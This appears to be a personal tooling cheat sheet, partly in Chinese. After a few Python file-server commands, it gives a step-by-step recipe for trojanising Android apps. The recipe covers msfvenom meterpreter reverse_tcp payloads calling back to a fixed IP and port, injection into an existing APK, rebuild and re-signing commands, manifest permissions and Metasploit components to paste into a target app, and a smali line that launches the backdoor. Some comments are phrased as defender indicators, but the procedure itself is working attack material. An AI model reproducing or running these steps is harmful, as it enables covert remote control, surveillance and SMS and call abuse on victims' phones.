XTools

Python FTP and HTTP file-server commands

# Starts pyftpdlib's FTP server on port 888. The -w flag gives the anonymous
# user write access, so anyone who can reach the port can upload or modify files.
python3 -m pyftpdlib -p 888 -w

# Starts Python's built-in HTTP server on port 888, serving the current
# directory without authentication or TLS; by default it listens on all interfaces.
python3 -m http.server 888




Android backdoor
# Both commands embed the LHOST/LPORT pair as the payload's callback endpoint.
# For defenders: outbound connections from a handset to that host and port are a
# network-level indicator, and the second command's output is a modified copy of
# an existing APK (-x app-debug.apk), not a build from the original publisher.
msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=103.146.159.130 LPORT=5555 -a dalvik --platform android -e cmd/base64 -i 9 -o Android.apk

or

msfvenom --platform android -a dalvik -e generic/none -p android/meterpreter/reverse_tcp LHOST=103.146.159.130 LPORT=5555 -x app-debug.apk -k -o result.apk
# Decode the APK into a working directory.
apktool d app-release.apk -o  app-release-assmebly

# Rebuild an APK from the working directory.
apktool b app-release-assmebly/ -o  app-release-assmebly.apk

# Align the rebuilt archive on 4-byte boundaries.
zipalign -p -f -v 4 app-release-assmebly.apk app-release-assmebly-zip.apk

# Check the alignment of the result.
zipalign -c -v 4 app-release-assmebly-zip.apk

# Sign the aligned APK with the local keystore password.keystore.
# NOTE(review): this is presumably not the original publisher's key, so the
# signing certificate will differ from the genuine app's. That mismatch is the
# most reliable repackaging indicator: compare certificate fingerprints against
# the known-good release before trusting an APK.
apksigner sign --ks password.keystore --ks-key-alias password.keystore --ks-pass pass:password --v2-signing-enabled true -v --out app-release-assmebly-zip-sign.apk app-release-assmebly-zip.apk

# The same rebuild, align, verify and sign steps chained into one command.
apktool b app-release-assmebly/ -o app-release-assmebly.apk && zipalign -p -f -v 4 app-release-assmebly.apk app-release-assmebly-zip.apk && zipalign -c -v 4 app-release-assmebly-zip.apk && apksigner sign --ks password.keystore --ks-key-alias password.keystore --ks-pass pass:password --v2-signing-enabled true -v --out app-release-assmebly-zip-sign.apk app-release-assmebly-zip.apk

以下内容拷贝到目标 apk 的 AndroidManifest.xml 文件


<!-- Permission and feature declarations. Together they cover network and Wi-Fi
     state, coarse and fine location, phone state, sending/receiving/reading SMS,
     audio recording, placing calls, contacts, system settings, camera, external
     storage, boot notification, wallpaper, call log, wake lock and battery
     optimization exemption.
     Triage note: a set this broad is a red flag when the app's stated function
     does not need it. Diff the manifest against the genuine release of the same
     app to see which entries were added. -->
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-feature android:name="android.hardware.microphone"/>



<!-- Component declarations: a broadcast receiver registered for BOOT_COMPLETED
     and a service declared with android:exported="true". Both class names sit
     under the com.metasploit.stage package.
     Detection note: any com.metasploit.stage component in a decoded manifest is
     a direct static indicator during APK triage. A boot receiver paired with an
     exported service that the genuine app does not declare deserves the same
     scrutiny even if the package has been renamed. -->
<receiver android:label="MainBroadcastReceiver" android:name="com.metasploit.stage.MainBroadcastReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
</receiver>
<service android:exported="true" android:name="com.metasploit.stage.MainService"/>
#复制到目标activity oncreat执行
invoke-static {p0}, Lcom/metasploit/stage/MainService;->startService(Landroid/content/Context;)V